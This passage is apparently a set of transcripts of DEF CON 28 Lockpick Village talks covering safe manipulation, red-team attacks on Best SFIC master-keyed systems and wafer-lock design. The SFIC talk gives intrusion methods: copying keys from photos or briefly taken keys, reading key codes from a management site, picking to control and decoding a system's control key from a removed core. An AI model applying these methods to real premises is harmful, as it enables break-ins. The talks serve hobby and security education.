shape, more uniform U shape. And so in the case of a die bowl group two, you want to take both contact points into account, since there will be less variation in each. You want to take both into account and look at the left going up and the right contact point going down. Now, some final tips is you want to be really precise in dialing. You want to not just read it in 1 eighth of an increment, but you want to dial to 1 eighth of an increment. You want to make sure you're not accidentally dialing 16 and 1 eighth or 16 and 1 fourth, because you're going every two increments. So maybe the combination is 15. You don't want to go 16 and 1 eighth and have it not open, but maybe on 16 you can detect it. You can detect that it's the correct number, but not 16 and 1 eighth. You want to make sure you're reading the dial from the same angle each time. So if you're looking at the safe lock, you want to make sure you are reading from the same angle. Let's say you're reading it from this angle this time. You don't want to look at it like this, as that will change where you think that contact point is. So you want to make sure you're really consistent, especially also with the amount of force that you use. You want to make sure it's the lightest possible and you want to make sure it is the same each time. So you want to be really consistent in everything you do. You can also try it with a known combination. You can, let's say you know the combination is 20, 40, 60. Well you can test at 20, 40, and 60. You don't have to graph the entirety of the dial. So just to be able to detect how the contact point feels when one of the gates is under the fence and how it feels when it's not, you can graph from let's say 10 to 30 and then like 10 above and 10 below each of the numbers, 20, 40, and 60, so that you can tell how the graph is supposed to look. And that is a very, very useful practice to do. You can also remove the back cover of the lock so that you know exactly what's happening and you can really correlate what you're feeling with what is happening inside the lock. And then if all this fails, you can buy my book. Well, not really. I put it online for free. So it is on Amazon, but I don't recommend it unless you really want a hard copy. There's a PDF I have uploaded at this link down here and you can download it and basically just do whatever you want with it. I don't care. Now on YouTube, I have a video series that follows a book. It's similar to this talk, but it's a lot more in depth. So it covers different sections that I have covered here in this talk, but with much greater detail and I also cover additional more advanced techniques in order to figure out the combination faster and with greater precision. There's online forums such as this link at the bottom here, it points to keeppicking.com and they are very welcoming to newcomers as long as you are able to show that you are not trying to use this knowledge for criminal activities and you are interested in this as a hobby. I mean, people are very welcoming. eBay, you can buy locks on eBay. I highly recommend SNG6730 or 6741. You can also just search up SNG6700 series and just practice. I mean, practice is the best way to learn. I mean, you can read and watch all the content on safecracking and understand everything that's happening, but you cannot develop the touch for feeling the contact point. You don't develop the sight for reading the contact point unless you actually practice. And I also just remember I forgot to mention this picture here. So in order to read the contact points and dial it more accurately, you can take a piece of paper or maybe a needle or anything and tape it onto the dial and the dial ring just to be able to more precisely pinpoint what is on the dial. And that is the end of this presentation.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50743 (DOI)
Hey and welcome to Keystone of the Kingdom. This is a talk on targeting best ESFIC locks and you'll know in a second about what that is just in case you don't. This is a talk being given to DEFCON 28's lockpicking village. Unfortunately we have COVID going on in the world and we are not going to be able to meet in person so I would encourage you to reach out to me on Twitter, reach out to me on Discord, inside of the DEFCON channel and I'd love to have your thoughts, your opinions, any questions you have sent on my way, I'm happy to discuss. Who am I? My name is Austin Mark. I'm a security enthusiast, first and foremost. I have been doing pen testing for a number of years for a small to mid-market tax consulting and audit firm called RSM and doing red team assessments where we regularly run into best ESFIC locks. We see them in the field. On the right hand side you also have my Hack the Box profile, Twitter, website. Feel free to reach out to me on any of those. And you have a disclaimer, I am not a locksmith. So my thoughts, opinions on how to secure locks probably should only be taken as an attacker, things that I think work. But really remediating these issues or operating your locks is something that's best sent to a locksmith who can give you better advice than I can. On the left hand side you have a photo of me at IKEA. I don't believe I ever got that mirror, which is unfortunate. But as I was flipping through photos trying to find something that I thought was appropriate for this talk, this was the one that stood out to me. So this is Anthology. This is a collection of talks that I'm giving at DEFCON and hopefully years to come. Other conferences, this is just how I organize my talks is all under this anthology brand. Left hand side you get this little picture of an ant, it's kind of like a circuit board. That's just my little anthology symbol. While parts of this lab should be done with locks and keys in hand, I'd really prefer this to be a hands on talk. We're going to deal with COVID and we're going to have some parts of this be a web based CTF where you can at least learn a little bit about Vest as FIX. When we get done with the talk, I will open up the CTF and anybody who would like to can join in, chase down some flags, there will be a prize for whomever wins. So feel free to reach out if you believe that you're the winner and I think we'll wrap this up 24 hours after the talk. Down at the bottom you have some logins. You have a CTF login at PCTF.ant.red. That is a CTFD instance that has some challenges. I think there's something like 10 challenges. Just kind of shooting the gambit across different parts of a targeting a Vest as FIX system. You also have course materials that just links out to a GitHub page. You can pull down some PDFs and some further learning resources if you're interested in Vest as FIX. Then you've got a Keystone web instance. You'll learn a little bit more in a second about what Keystone web is. But there it is out at ksw.ant.red. Down at the bottom you have a login for that. Alright, so let's jump into the agenda. So here's what we're going to try to cover. What are S-FIX? What are key marks? It's kind of in the name. It's the marks on the S-FIX keys. Where are S-FIX? So where are you going to find them? And then what can we do once we found them? So first and foremost, what is an S-FIX? SFIC stands for Small Format Interchangeable Core. Let's see. Yep, you guys can see it there. They're a way for businesses to change which key goes to which door quickly. They can also provide a means of access control. So Sally shouldn't be able to go into Jim's room. But the janitor should probably be able to go everywhere. So that janitor needs to be able to get access to both of their rooms. So to be able to do that, you have a master key that will open both doors. So to that end, these pins that go inside of these locks are considered master key. There's a number of different segments and you'll see in a second what those kind of look like. Moving on from that, where are we going to find S-FIX? S-FIX are in schools, office buildings, hotels, and very large businesses. So you'll see them very regularly. I remember when I gave this talk or a talk similar to this last year at DEF CON, I noticed a ton of S-FIX all around me. It's kind of one of those things where you get a new car and all of a sudden everybody is driving your car. So this is kind of the same thing. You figure out that you have an interest in S-FIX and everybody suddenly has an S-FIX and it's always something to look at. So what are keymarks? Keymarks are exactly what they sound like. It's simply a stamp that is put on a key for tracking. It should help you know if a key goes to a door. And it'll also help you track who has access to what. So what can we do once we know that there's an S-FIX that is part of this environment that we're targeting? We could potentially just pick it. We can potentially duplicate some of those keys. If we're able to get access to them, we're able to move laterally with those keys because they are part of the system. So if you know where you are within a system, you can potentially move from one door to another. And that all gets kind of done by doing what is called system decoding. And we'll walk through some of what that is and how we do that. Alright, so we'll talk a little more about what these S-FIX really are. So an S-FIX, as it would be installed, is on the left hand side. You can see on the front you've got a core mark of what appears to be PG7. And it says best. So you definitely know you're dealing with a best S-FIX rather than another manufacturer's S-FIX. For this talk, we will be specifically talking about best A2 system S-FIX, which is the most common. These are the ones that I see the most often in the field. This is a door that would only be openable by the PG7 key or another master key or key that is mastered to the PG7 core mark. So if I were to get a key at an elevated part of the hierarchy, I could also operationally open this door. You also have a control key. Control keys can open any door in a system. And they're particularly sensitive and we'll talk a little bit about how to get access to those in a little bit. So on the inside of an S-FIX, this one has been fully gutted, so you don't really have any pins in here, but it helps us kind of walk through what the different items are. There is a cap that typically goes in the top. You have an operating shear line that will allow this to turn freely, which would move these throw pins and unlock a door. Or if there is a different, the control pins are set in such a way that the control lug would turn, this would allow the core to then rotate and pull in the control lug, which would allow you to remove the core from the door. So that is the parts and pieces of an S-FIX core. We'll have a kind of exploded picture after this that should help explain that a little further. And really the goal of this slide is to make sure you're familiar with the control lug, which allows this to be placed in a door, secured to a door, and then operated with operating keys. Cool. All right. So IC cores, these are interchangeable cores. On the left hand side, you have a standard housing that will typically hold one of these cores. It's not exclusively these indoor cores. You might actually have a padlock, much like this one. Yeah. So you could potentially gain access to one of these. And when we start talking about removing cores and walking off with something and gaining access to the full system because you have something in hand, something like a padlock like this is particularly useful. Right. And then on the right hand side, you have an exploded version where you can see the key, the plug, the bottom pins, the cylinder cover, cylinder itself, all of the segments we talked about. So that's part of that master keying. And then your springs and your top pins that you will be bumping out if you're going to get one of these locks. Moving on, let's talk about S-FIT keys. So these are S-FIT keys like this. And you can kind of see on the front there a key mark. So on our screenshot, it's BA1. On the one in hand, it is SR1. On the key in hand, we also have a key way marking that is H. If you can see that, I hope. And then there's also key way mark A on the key in the picture. The serialization marking is particularly useful for tracking multiples of the same key. So let's say we had 10 of these. And I wanted to know if Stu lost his version of the key, I'd like to be able to know which key is missing by maybe taking a account of all the keys and saying, hey, serialization key is missing this specific serialization. Stu, what happened? I thought we trusted you with that key. And then lastly is just this tip stop. So let's talk about systems. So this is the hierarchy of a best S-FIT system. The top, you have the control. The control key will operate every key within a system and also allow you to remove one of these S-FIT cores from the door. And if you can remove a core, you can decode the entire system. We'll talk a little bit about what that means and what the impact of that is. But if you can get a control key, you're golden. If you can get a grandmaster key, you're also golden. A grandmaster key will operationally turn every lock within the system. So if you can grab a grandmaster key, you can open up any door within that system. So typically you'll see GM written on a key that is a grandmaster key. So if you can find a key on a lanyard or sitting on a desk that says GM, that might be one to take a picture of or borrow for a moment or what have you. Typically if there's different systems within, there might be a master of system A, master of system B, and those are just submasters. So many times you'll see written as MA, MB, MC, MD. It's not a hard and fast rule. It doesn't have to be true. It's just kind of a general thing that has been observed over the years. Operating keys. As we've discussed, these are keys that you typically give an authorized user to access their office or their door or the server room or some other sensitive area. I've been told by a number of college students that they see these operating keys or they're given them as part of their dorms. So maybe they have the operating key to their door and a submaster belongs to a whoever runs that part of the dormitory. A CA I think if you call it. So moving on. Keyways. So let's talk a little bit about keyways. The best SFIC keyways are a part of their control system. The keyways are intended to increase the complexity of an attack against best SFICs. So if I were to hold up this best SFIC that has, I believe to be a H keyway and I were to pop that key in there. He works no problem. So he fits in there. No issue whatsoever. And then if I were to hold these two SFIC keys together, you should see they're very different. Very different cuts. So unfortunately, even though this is a completely empty keyway, I'm not going to be able to fit that in there. And that's just a function of a control of the best SFIC family. So in the middle, you can see a chart of all the different keyways that best offers on their standard non-core max non overly complicated best cores. Again, this is just targeting this specific talk is just going to be about best SFICs inside of the A2 system because these are the most common ones that I see. There are also multi keyway keys. So this is kind of exciting. So if you take a look at the WA, WB, WC items on your chart, you'll see that those keyways are kind of similar. So you could potentially have a single key that works for all three. And this just adds additional complexity and mastering opportunities between different best SFIC cores. On the right hand side, you can see a Falcon multiplex family set of core keyways. Those, I think it's just a good example of an all section key up at the top. And then you've got two multi section keys that are kind of unique. And then it steps down into single section keys and then another keyway that would potentially open for any key. So the keyway is potentially openable by all the other ones above it. So moving on. Let's talk about a lot of our movement. This item here on the right is straight from a code book. A code book is something a locksmith uses to track what the key codes are for a key. If you hold this lock this key up for you can see the bidding that bidding directly relates to the key code. So if you can get a key code, you can cut a key up at the top, you have SMBA. So that's a sub master for the BA system. And then you have a couple other keys that are part of the BA system. Alright, so if you note there is actually a pattern going on between the fifth and sixth columns of the key code where it kind of steps up by two and then down. Or vice versa. It could be if you're going from the third column from the right to the column second from the right. You're going down and then up, up, up and you're cycling every four by two. So it's a lot easier for me to show you a video of what this actually looks like because it looks a little complicated here but there is definitely a pattern that you can abuse. So potentially you can move laterally. Alright, so we talked a little bit about the keys themselves and kind of the key codes and what they mean. Let's talk about what happens if you get a key in hand. If you can get a key in your hand, you could use a key to coder and you could quickly discern the bidding and recreate those keys or at least get an understanding for where that key goes within a system. And then you could also use calipers. So calipers probably not these little tiny measuring calipers on the right hand side that attach to a key chain but calipers will measure your pins or your bidding on a key and you can use that to recreate either a core or the key itself. So if you can get a key or core in hand, you can definitely duplicate it then. Alright, key in photo, you could use one of these decoding charts. These are provided by D.V. and Olam. I find these ones very useful. Their usefulness depends on the quality of the photo that you take of course. If you have a photo that's kind of jostled or shot from across the room, it might be a little more difficult to actually make that photo work for you. But with some Photoshop magic, you might be in luck. There's also an app called Snap to Coder. I have had mixed results with this app. Honestly, I haven't gotten much usage out of it but I figured I'd share it. This app promises to be able to discern the bidding of a key by holding it up to the app. So in an ideal world, you would be able to take this app and maybe in a future update or maybe an update that I haven't seen, you'd be able to point this app at a key, tell it it's a best aspect key and it will tell you the bidding and then you can go off site, recreate that key and start opening doors right then and there. So these are two ways that you could take a key and a photo using a decoding chart or an app and start to understand what the bidding is for that key and potentially recreate it before handing it back to a mark or having to leave it somewhere so you're not being detected. All right, cool. All right, so we talked about key in hand, key in photo, what about key on web? So keys on websites that are active, directory integrated. That sounds great to me as an attacker. As a red teamer, I'm always targeting active directory. That's something that we're always looking for is a way to move laterally within AD. Keystone web is a active directory managed and active directory joined website where you can, their phrases, it will help the user manage keys and core records for multiple personnel throughout various locations. This product allows for importing and appending data, mass deletes for employees, key door and door key data and an activity log that tracks user transactions. So if we add a new employee, maybe he gets a new key to his door. If I have access to this website, I know exactly what that key is. And then I also know the master key, right? So if I look on the right hand side here, you see the master key code is 8301836. If I recreate a key with that code, I can now open every door within that system. And then you also see the control key bidding. So that one was 4189250. That's particularly useful because that tells me that I can now start removing some of these cores from the system if I want to and adding my own for potential denial of service, of course, but there may be more interesting things that you can do by swapping out a core. You might be able to start decoding the system if you don't have access to something as powerful as Keystone Web. We can also see up at the top the system type, which is an A2 system. I know we spoke about specifically best SFIC A2 systems, and that's what we would be targeting. We see the keyway for this system. So this is an A keyway system. And we see it's a 7-pin system. So we know that we're going to be working with 7-pin locks. The majority of the best SFIC systems I see are 7-pin systems. And part of what makes them difficult to pick is the fact that they're 7-pins, but then also they have master keying. And because they have master keying, it's very easy for those as wafers to fall as you're picking. And it's very hard to line them up consistently with what would be an actual operating bidding. But we will talk a little bit about picking to control. And that's something you would do if the core is in the door. So if the core is in the door, you can pick to control with a Peterson I-Core tensioning tool. So this is a type A tool. This is for tensioning a SFIC. And what it's doing is it's putting pressure on the bottom of the core inside of those holes that we saw, these same holes here, if you can see that. So those holes are getting tensioned by this tool. And what that does is that forces pressure on where the control pins would be. And because there's now pressure there, when you pick the lock, you have a higher likelihood of picking to control. And if you pick to control, you could potentially get this core out of the door, which would be great because now we can open that door, but we can also replace the core with a core of our choosing or begin to decode the system. And we'll talk about that just after this. There is another option. You could do what is referred to as bitch picking. It's not my name for it. But that's basically jamming a pick inside of a best SFIC over and over again, fairly aggressively. These locks are actually fairly prone to that. Something to do with the way that master wafers work. A lot of times you'll get lucky enough to pick to control. And if you're able to do that, you kind of have the keys to the kingdom. You can decode every part of the system once a core is in your hand. So then I also have a photo of the Leishi best SFIC 2-in-1. This is a decoder for best SFIC locks that you can decode. This is the operating key as you pick. So you put tension on the core and you're able to decode it using the chart on the right hand side. They're a little spendy, so I don't carry one, but I do have a couple for non-best SFICs. Cool. So core in hand. So let's say we're able to get one of these cores in hand. What we might want to do is pull the pins out so we can actually understand how the system works and decode that system. So we might 3D print one of these. This is a SFIC pin extraction tool or re-pinning tool. Red Cat Imaging put this out on Thingiverse. I strongly recommend you go pull it down from there. A standard all metal version of this goes for well over $100 everywhere that I've ever seen them. And a 3D printed version is pennies. And they work beautifully. So from what I've been told, they're not an easy print, but if you were to pull one in and run it inside of a presser, apparently they've been fairly successful. I had a friend print this off for me and it works great. Essentially you're going to take your SFIC, pop them inside. You can hammer out of the number of different ways. Some people like to use the like a flag pin that you could stick in the top of one of these holes and knock the pins out of the bottom. So what you're going to do is you're going to pop the caps on the back here and hopefully all of that gets collected. Hopefully just the top caps. And then you can slowly remove the rest of your pins. And really what you're interested in is the top pin. So we're going to talk a little bit about the coating pins. Alright, so we've extracted pins. We've hammered them out. And you can see I've got them sitting inside of a little sparrows tray that I've got with the top pins up top. And we can begin to kind of measure those. So there's my calipers on the right hand side. We were able to measure them and for whatever reason this is in millimeters, but it needs to be converted to inches for the chart that's provided by I believe this was from Best. And it comes out to for this specific pin that I was measuring.07. So that.07 pin lines up with a 6B pin. So we know that that pin, that top pin is a 6B pin. So that helps us understand, okay, so here's, here's our top pins. Here's what we, here's what each of these items are if we want to recreate this core. But where this gets really helpful and really, really interesting is when we start to decode a system using a, so this is a decoding chart. So we can fill this out with your top pins, your buildup pins, master pins. If there are any, of course, there typically will be in a lock like this. And then you will subtract from 13 the measure of your top pin. And that will give you the control key bidding. So as we discussed, a control key thing is something you can use to create a control key. And if you create a control key that can open every lock in the system, if you can open every lock in the system, you can go into any door in the organization that you're targeting. So if you can potentially gain access to, you know, a lock like this, or perhaps it's the core of a, of a bathroom or something that's, that's non, non sensitive, and you're able to decode the control key, you can now leave, come back with that control key and, and start removing cores to very sensitive doors that you'd like to gain access to. And that's it for this talk on Keystone to the Kingdom, a talk about targeting best Svick locks. I would ask for a Q and a here now, but because this is COVID for all remote, we can't, we can't do that. But I would encourage you to reach out to me on Twitter, send me a DM on Discord. And don't be a stranger, feel free to reach out, give me your thoughts, ask questions. If something wasn't clear, let me know. And, and I, I welcome it. So thank you.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50745 (DOI)
Welcome to my talk. I'm going to be chatting about wafer locks today and why they're awesome. It's going to be very theoretical and it's going to be mainly coming at this from the lock engineers perspective if I might be able to flatter myself. I'll start by telling you a bit about who I am and then I'll cover some definitions of the rule on the same page and then I'll show you a small selection of wafer locks through my eyes. So, who is this loon who thinks wafer locks are pretty secure? Well, it all started about three years ago when I thought it would be a good idea to design a challenge lock for Huxley Pig 69 who is renowned in the lock pig community for being the first person to publicly pick the Abloy Classic and who designs tools for cracking high security locks non-destructively. In the last year or so of this now three year journey, most of my focus has been taken up by wafer locks and that's not because I've finally broken down mentally and started rambling but rather because I genuinely think they offer a good solution to the problem of designing a high security lock. So, what makes a lock high security? Well, a lock is a reusable seal which has two important properties. It's got to be tamper evident so that if the lock is defeated, it's obvious. And the second important feature is that defeating that lock should take as long as possible. Ideally, you're able to preclude covert and surreptitious attacks and ideally an overt entry will take forever. An overt entry is one that is immediately obvious. So that's typically destructive attacks like drilling or using explosives. Covert entry is an attack on a lock that won't be immediately obvious to a casual observation but if you were to strip the lock down and analyze it forensically, it will reveal what method was used to open it so there's normally covers lock picking and impressioning because they leave small scratches and marks on the inside of the lock. And finally, there's surreptitious attacks which don't leave any forensic trace whatsoever and this would be stuff like duplicating the key from a photograph. How high security a lock is determined by the amount of time it takes to compromise a lock with an attack in each of those categories. Ideally, you wouldn't be measuring that in seconds. Ideally, you'd be measuring it in minutes or in a really, really good world where security engineers are doing a fantastic job in hours. So since those locks are designed, or since high security locks are designed to make lock picking and impressioning attacks as difficult as possible, if not impossible, a lot of them have been designed with some very wacky mechanisms. So you can't always take the approach that you would normally take if you were picking a pentumbler lock and apply that directly to a high security lock. So instead, I've kind of abstracted the lock picking process into these four requirements. You need to be able to get feedback from the lock because that's how you tell what state the lock is in and how close you are to having it open. And it also tells you what your next step might be to get the lock open. You need to be able to manipulate and tension the locks simultaneously. So some locks like the Western Electric 30C or the Abloy Protector 2 have blocking mechanisms that, while not preventing manipulation or tension, prevent you from doing them both at the same time. And so they're phenomenally difficult locks to pick as a result. By tension, I mean applying a force on the lock in the direction that drives it to open. So how you do that depends on the particular kind of lock. But the key idea behind this is that since it's impossible to manufacture the components of the lock perfectly and you have manufacturing tolerances, these manufacturing tolerances result in every single component being very slightly differently sized or shaped, which then causes them all to behave very slightly differently. And that's the case regardless of how well you machine the parts and regardless of whether or not you have a very low quality lock or a very high quality lock. And finally manipulation. Manipulation is just the ability to move the components inside the lock with a tool of some design. Those are the things to keep in mind when I start taking you through these locks. So what is a wafer lock? This should be pretty straightforward, but apparently for some people that's not quite so clear. Some people whom I happen to have a lot of respect for, so that is not to criticize them in that sense, but I do disagree and the reason I disagree sometimes with whether or not a lock is a wafer lock or not is because this is how I define it. If you're working off a different definition then obviously in some cases you're going to get to a different answer. So we've got some typical sliders shown in the top corner here. These two are from an Acidesmo which is a reasonably high security lock, but not one that I would probably deem high security for the purposes of this talk. And these are from a cheap wafer lock, a not wafer lock, slide lock. And in both cases they slide laterally and they have to be slid the correct distance to allow the lock to open. A wafer lock is a special kind of slide lock where the total length of the wafer is the same as the width of the core that they actually sit in. So here's an animation to kind of make that a little bit clearer. When the wafer is incorrectly positioned it sticks out either one side or the other and prevents rotation. And when it's perfectly correctly positioned in the center there it will allow rotation. So to start things off let's take a look at the kind of wafer lock that you're probably familiar with and the kind of thing that probably sprang to mind when you first read the word wafer lock if you've had any prior experience. If you haven't gotten a clear what a wafer lock is in a normal implementation then that's exactly what I'm going to take you through. So at the top here we can see six wafers sticking out the top of this core. And this is the lock of rest. If we insert an incorrect key or if we insert the correct key but not all the way then what you'll see is that some wafers will stick out out of the top and some wafers will stick out of the bottom of the core. And this will prevent rotation. When the key is fully inserted or the correct key is fully inserted then what happens is they all line up along the top and bottom edges of the plug or the core and they allow rotation of the core. So excellent. But that's not a high security lock. There are three cuts per position and only six wafers so that's not a very large number of difference. The core design makes it very easy to tension. You can just bend a piece of wire and insert that, apply a rotational force and voila you have tension. And interestingly about wafer locks you can't just design anti-pick shapes into them in the exact same way that you would a pin tumbler lock. It's possible to do but it's a little bit more tricky than for a normal pin tumbler lock. So now that I've shown you an example of a really bad wafer lock let's revisit the actual principle behind wafer locks and maybe I can show you a wafer lock that wouldn't be so easy to pick. The main idea here is to approach the design differently. So rather than our cheap low quality wafer lock which has a key which applies tension to the core and then the core applies tension to the wafers and ultimately opens the lock. We can achieve a much much higher level of security if instead we have the key only act on the wafers and never directly act on the core. So if we have a key that aligns the wafers correctly and applies turning force to the wafers and then the wafers transfer their turning force to the core. If they're correctly aligned the lock will still work but it's a lot lot harder to tension. So to show you what I'm talking about here's another animation, this one much less well made than the other one. This grey bit in the middle is our key, the beige yellow element is the wafer, the part highlighted in blue is the core and all around the outside in grey again is the housing. So the way this works the key is longer on one side than it is on the other and when we turn it clockwise it makes contact with the wafer on one side first. So in this case it makes contact at the bottom and that causes the wafer to slide to the left. And the wafer slides to the left until it meets the other side of the key. At which point there's no longer a lateral motion for the wafer but instead it gets jammed in place like that and the force on it becomes a rotational force. In this case the wafer is correctly aligned so that rotational force is then transferred to the core and that results in the core turn. If it weren't correctly aligned then what would happen instead is that rotational force would be applied to the housing and the core wouldn't move at all. If you want to have a system that works that way then there are two key requirements that you need to meet. Firstly as I just mentioned the wafer has to be aligned correctly otherwise it's going to apply that rotational force to the housing and nothing will move. And secondly the key must have at least two points of contact on the wafer on opposing sides of the wafer. That's the point at which that lateral force is translated into a rotational force. That's something to keep in mind for later when we take a look at some of the more interesting locks. The main implication of this is that the lock becomes ludicrously difficult to tension because traditionally what you would do is you'd apply tension as the first step in the lock picking process. And when you do that at least one of the elements is going to bind in some way and then you can reach through with some kind of tool and prod on those elements until you find one that's binding. That's the one that you know you need to move and you can move until it stops binding at which point you know you've correctly positioned it. But that's not possible with this because in this case you're going to have to align one of the wafer's correctly first in order to apply tension. And since you can't apply tension before that point in order to know where to place it you have to guess. So in the example animation that we just looked at, if I go back, there are six possible positions. So that means you would need a tool that has six different ends on it to simulate the key at that point. And what that means is that because only one of those tools will work, the whole lock picking process and how quickly you can open that lock covertly is massively extended because you're going to have to test each of those tools until you find one that works. And on average it would take you three and a half tries. So the amount of time it would take is massively increased because that's the requirement before you can even begin the lock picking process compared to other kinds of lock where you can just apply tension and get started straight away. So the main wafer lock that I want to look at is the Chroma Protector. But there are a number of problems looking at the Chroma Protector at the time that I started thinking about it. I didn't own one so that made looking at how it worked tricky. And generally information on it is scarce. Here are the sources that I've found and I've learnt from. It's worth noting that Graham Pulford in his book High Security Mechanical Locks refers to the Chroma Protector as a lever lock. Now he does this because he categorizes his locks based off the design of the keys. But I think it would be very misleading to describe the Chroma Protector as anything other than a wafer lock. And if you really want to deal into the detail of the Chroma Protector and exactly how it works, Jaco Fargolin's talk is absolutely fantastic and I highly, highly recommend it. So as I was saying, the Chroma Protector is a lock that I didn't have access to. So there was a motivation to make one for myself. So that I could test whether or not it worked in the way that I thought it did. Because I'd been thinking about it theoretically for quite a long time. But things don't always translate into practice in the same way. I wanted a prototype that I could play around with and that would prove whether or not it worked in the way I expected it to. The other reason is when you design a lock, you tend to gain a lot of insight into how that mechanism works and why some of the design features have developed in the way that they have. And so my hope was that since the Chroma Protector is a reasonably complicated lock in terms of some of the particular security features that are found in it, that I might gain some extra insight. So I previously designed locks. And the only one that I ever produced was made of 3mm plywood sections cut with a laser cutter. So that's exactly what I wanted to do again with the Chroma Protector because I had access to a laser cutter and I had access to 3D printers. And so that was the logical step for me. And I couldn't see any reason why the design couldn't work that way. I wanted to fit the same size as the Chroma Protector that I now have because if you design with the same constraints as the actual engineers who designed the lock whose inspiration you are taking, you'll get a better understanding of why they've made those decisions. If I didn't limit myself in that way, I might miss important details. And finally, I wanted to include all of the different basic possible wafer designs that I had found in patents up until that time. So if I take you back here, there are some examples, but we'll dig into that in just a little bit. Some of the other requirements that I set for myself were that I wanted it to be springless. And I wanted it to be springless because A, I couldn't see a good reason why the mechanism needed springs at the time. And B, because most safe locks are designed so that since springs fail generally first, most safe locks are designed so that they are not dependent on those springs in order to function. Because you don't want to have your secure lock inside your secure container fail on you. And also adding them point B is a bit of a pain and makes designing them a lot harder, designing the whole lock a little bit harder, especially if I were then to give this design to other people for them to learn about. I wanted it to be as high security as you can possibly get, considering I'm making it out of 3mm plywood. So in terms of non-destructive entry, I didn't want it to be possible to just look at the insides of the wafers through the keyway and from their shapes discern what the bidding on the key needed to be. Or needs to be to get that lock open. I also didn't want it to be possible to just push the wafers to their maximum range left and right and for that to be different. Because if that's different and has any kind of relationship to the actual length on the sides of the wafers, then you can rapidly gain an idea of what the key has to look like. And then I wanted the lock to also be self-scrambling. So self-scrambling is this concept that all locks do, and lots of locks do this through having springs. But that's not necessarily required. The idea behind a self-scrambling lock is simply that when you insert the key to open the lock and you turn that key, it aligns all the components in their correct positions. And if you then close the lock, one of the important things would be to scramble the positions of those components so that the next person coming along who looks at the lock after you've locked it doesn't just need to stick in a small bit of wire and apply a bit of tension, the lock pops open. I didn't want it to be a central wafer position. This was kind of just a minor I want to be annoying feature. If a wafer were correctly positioned dead center, it would be substantially easier to tension than any of the other designs, because any tool that has equally length bits on either side would be sufficient to tension it. Whereas that's not the case for any other position. So I thought if I could take that out of the equation, that would make the lock just a little bit more secure. And the final problem that I ran into was reliability, so this is kind of related to the spring, what I was saying about springs earlier, but this is kind of just the idea that there shouldn't be a possible position that the wafers could get themselves into where you couldn't insert the key into the lock. Unfortunately, that's something I failed on. I couldn't balance making my lock without any springs, having it be self scrambling, and have there been no possible positions where the wafers could get into where the key couldn't be inserted into the lock. That was just beyond my ability as a self-taught engineer to resolve. So, what I came up with. I used a 3D printed key. The lock itself contains seven wafers. The key is tip-stopped, and the key has a very mild profile, so you can't insert it the wrong way, and it will align both at the end and at the neck, basically, or at the collar of the key, so that helps with alignment. And it breaks itself open. So, this was the most important thing that I learnt when designing this, when I finally had it in my hands. You need two points of contact on a wafer in order to rotate it, or in order to tension with it, and that's all well and good in the opening direction. But I found as soon as I reversed the key, there was no more than one point of contact on any of the wafers, and so the key can't turn the core backwards. And so once you open it, it stays open. Which is a little bit unfortunate. But, nevertheless, I'll do my best to make the files available for others to play with. Here are the four basic wafer shapes that I ended up creating, and they all work in the open direction, at least. On the bottom right, we have a full wafer. This is the bog-standard wafer, and most closely resembles what you'd see in other kinds of wafer lock. On the bottom left, we have a half wafer. The idea being that it's missing one half of the surface, so the key can't tension off this wafer in order to drive the core around, but it still needs to align that wafer correctly in order for the lock to open. So, that makes it a little bit harder to attack, because this wafer would be much harder to tension than the full wafer. Up here on the top right, we have a split wafer that doesn't have a limit on it, but either end. So, this basically functions like two half-wafers, so you need to align both of them correctly, and there are actually different cuts for each of them. And then lastly, in the top left, we have the limited split wafer, which requires that the key be the correct length in order to drive both these halves together, so that their total length is the same as the core is wide, but they also need to be aligned correctly left to right. And the hope was that that would be particularly difficult to manipulate, and I wanted to see how that bound up when it did. So, my analysis of it. You can't easily decode it, and it does work in the opening direction. It does self-scramble. And it might be non-trivial to destroy if it weren't made of 3mm plywood sections. But all in all, probably not something you're going to want to use in a safe. Especially not when you could use something like this. So, this is really the inspiration for my design, and I'm not going to claim any greater originality with what I created. I was hoping to just create a simplified version of this. So, I'll give you some basic details about it. It's 68mm across, and it weighs 730g. It is not a small lock. It contains 11 wafers, which, from a brief reading of the key, have at least 7 possible cuts per position. There may be more. In practice, there are probably fewer in lots of positions, because although in theory any of the layers are completely interchangeable, in practice, at least for the ones that I have seen and that Jaco analyzed in his talk, there seem to be certain patterns of wafers where some of them don't actually vary very often in position or cut. Notably, so two things to note about my Chroma Lock. One, it's not made by Chroma. I suspect heavily that it is made by Carl Wittkopp or Carvey, which is a German safe manufacturer, presumably under license. And the second detail is that I'm pretty sure that my Chroma Protector is not the latest version of Chroma Protector. However, this was the same Chroma Protector as Jaco was covering in his talk, and so I feel pretty happy that there's still some benefit worth looking at this. So, we'll start by looking at the key, because the key is pretty complicated. And there are a whole bunch of details to pick out. Here are the seven that I've decided to pick out. So, the Chroma Protector has a post, so it's basically got a large spike that runs the length of the lock down the center, which helps align the key, but also removes space that you'd want if you were going to design a tool to fit into the keyway and to manipulate the wafers. It's also got this ramp, and if you design a tool to fit inside the lock that doesn't have this ramp, what you'll find is that one of the wafers has a portion of it that sticks into the keyway, and so you won't be able to insert your tool all the way into the lock unless you simulate this ramp. And interestingly, at least in principle, if you were designing a tool, you'd need to have that ramp on both sides so that you can push the tool in and pull it back out, back past that little ledge on that wafer when that wafer springs back into position. But the problem you're going to run into is that this ramp is the same width as one cup. So if you're designing a tool, what you really want is you want a tool that allows you to manipulate wafers individually. You don't want to have a tool that's so thick that it's going to 